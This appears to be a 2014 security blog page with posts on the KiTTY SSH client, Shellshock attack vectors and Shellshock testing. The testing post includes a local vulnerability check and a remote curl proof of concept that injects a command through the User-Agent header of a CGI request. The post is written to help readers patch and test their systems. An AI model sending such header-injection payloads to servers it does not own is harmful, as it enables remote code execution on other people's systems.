"It's done." - developer
"It's secure". - vendor
"It's deployed." - admin
...
"It's 0wn3d." - #hacker
Mar 11, 2015
Nov 6, 2014
Kitty to Replace Putty
Tags:
tools
Just switch from Putty to Kitty recently, for a few reasons:
- Available in Portable format (like Putty).
- Built-in transparency.
- Quick start of duplicate session (ctrl+shift+click).
- kscp integration (drag and drop or ctrl+F3).
- hidden text editor (shift+F2).
Oct 13, 2014
ShellShock Attack Vectors
Tags:
[Vuln],
0day,
attack,
shellshock
Shellshock attack is popular, and wormable too. However, it requires an attack vector for it to works. Here're some of the common attack vectors for shellshock to work:
- (Apache/etc) httpd - If the CGI script calls Bash, the script could execute arbitrary code as the httpd user. mod_php, mod_perl, and mod_python do not use environment variables and we believe they are not affected.
- (Secure Shell) ssh - It can be used to execute any command, via ssh, scp, git, rsync, etc.
- dhclient - The Dynamic Host Configuration Protocol Client (dhclient) is used to automatically obtain network configuration information via DHCP. This client uses various environment variables and runs Bash to configure the network interface. Connecting to a malicious DHCP server could allow an attacker to run arbitrary code on the client machine.
- CUPS - It is believed that CUPS is affected by this issue. Various user supplied values are stored in environment variables when cups filters are executed.
- sudo - It could still be possible for the running command to set an environment variable that could cause a Bash child process to execute arbitrary code.
- Firefox - No detail about it as of now.
- Postfix - While the Postfix server does call Bash in a variety of ways, the Postfix server will replace various characters with a ?, and may allow an arbitrary environment variable be set by the server. It is however possible that a filter could set environment variables.
Sep 27, 2014
ShellShock Testing
Tags:
[Vuln],
0day,
cmdline,
pentest,
shellshock
Patch your /usr/bin/bash NOW. The 'Shellshock' bug blasts OS X, Linux systems wide open. The attack vectors are the CGI scripts to DHCP clients (and maybe more), which will lead to remote-code execution.
Proof of Concept - at local system
A simple test to check if your Bash is vulnerable is available publicly.
Proof of Concept - to a remote server.
Proof of Concept - at local system
A simple test to check if your Bash is vulnerable is available publicly.
$ env var='() { :;}; echo vulnerable' bash -c /bin/trueUpon running the above command, an affected version of bash will output "vulnerable". Once the patch has been applied, the same test will return the following result.
bash: warning: var: ignoring function definition attempt bash: error importing function definition for 'var'
Proof of Concept - to a remote server.
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id"A vulnerable web CGI will return uid=48(apache) gid=48(apache) groups=48(apache), and follow by HTML page. A non-vulnerable should return just the HTML page.
Subscribe to:
Posts (Atom)